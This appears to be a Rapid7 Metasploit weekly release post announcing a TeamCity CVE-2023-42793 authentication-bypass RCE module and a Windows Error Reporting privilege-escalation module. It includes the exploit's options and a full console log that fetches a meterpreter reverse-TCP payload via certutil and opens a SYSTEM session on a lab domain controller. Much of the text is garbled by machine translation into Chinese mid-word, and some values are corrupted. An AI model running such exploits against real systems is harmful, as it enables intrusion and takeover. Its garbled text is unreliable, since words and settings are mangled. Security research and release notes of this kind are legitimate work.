Last updated at Mon, 22 Jan 2024 21:52:32 GMT

TeamCity authentication bypass 和 remote code execution

This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4个国家容易受到这个问题的影响. The vulnerability was originally discovered by SonarSource, 和 the Metasploit module was developed by Rapid7’s Principal Security 研究er Stephen Fewer who additionally published a technical analysis on CVE-2023-42793的攻击者kb. A Rapid7 TeamCity客户咨询 has also been released with details on mitigation guidance.

This exploit works against both Windows 和 Linux targets. 使用示例:

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options 

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,类型:主持人:港口][...]
   RHOSTS                    192年.168.159.10是目标主机
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait f或者是 changes to be applied
   VHOST                                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            过程          yes       Exit technique (Accepted: '', 医师, 线程, 过程, 没有一个)
   FETCH_COMMAND       CERTUTIL         yes       Comm和 to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cymQYMMk         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST                192年.168.250.134  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


开发目标:

   身份证的名字
   --  ----
   0的窗户



View the full module info with the info, or info -d comm和.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*]启动TCP反向处理程序.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+]目标易受攻击. JetBrains TeamCity 2023.05.检测到3 (build 129390).
[*] Token already exists, deleting 和 generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*]内部修改.属性以允许创建流程...
[*] Waiting for configuration change to be applied...
[*]执行负载...
[*]内部复位.属性设置...
[*]发送阶段(200774字节)到192.168.250.237
[*] Waiting for configuration change to be applied...
[*]删除认证令牌.
[*]计量器第2次会话打开(192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400

meterpreter > getuid
服务器用户名:NT 作者ITY) \系统
meterpreter > sysinfo
计算机:DC
操作系统:Windows 2016+.0 Build 17763).
架构:x64
系统语言:en_US
域:MSFLAB
登录用户:9
计量器:x64/windows
meterpreter >

新增模块内容(2)

JetBrains TeamCity Unauthenticated Remote Code Execution

作者:sfewer-r7
类型:利用
拉的要求: #18408 提供的 sfewer-r7
路径: multi/http/jetbrains_teamcity_rce_cve_2023_42793

Description: This adds an unauthenticated RCE for JetBrain's TeamCity server on both Linux 和 Windows. A remote attacker can exploit an authentication bypass vulnerability 和 then execute OS comm和s in the context of the service.

Microsoft Error Reporting Local Privilege Elevation 脆弱性

Authors: Filip Dragović (Wh04m1001), Octoberfest7, 和 bwatters-r7
类型:利用
拉的要求: #18314 提供的 bwatters-r7
路径: windows /地方/ win_error_cve_2023_36874

Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 和 enables an attacker to elevate privileges to those of the NT 作者ITY) \系统 用户. Note that this module works with Windows 10x64 22H2.

增强功能和特性(1)

  • #18399h00die - Fixes multiple spelling mistakes in module documentation.

文档

You can find the latest Metasploit documentation on our 文档ite at 文档.metasploit.com.

得到它

As always, you can update to the latest Metasploit Framework with msfupdate
和 you can get more details on the changes since the last blog post 从
GitHub:

如果你是 git 用户,可以克隆 Metasploit框架 (主分支)为最新.
To install fresh without using git, you can use the open-source-only 夜间的安装程序 或者是
二进制安装程序 (也包括商业版).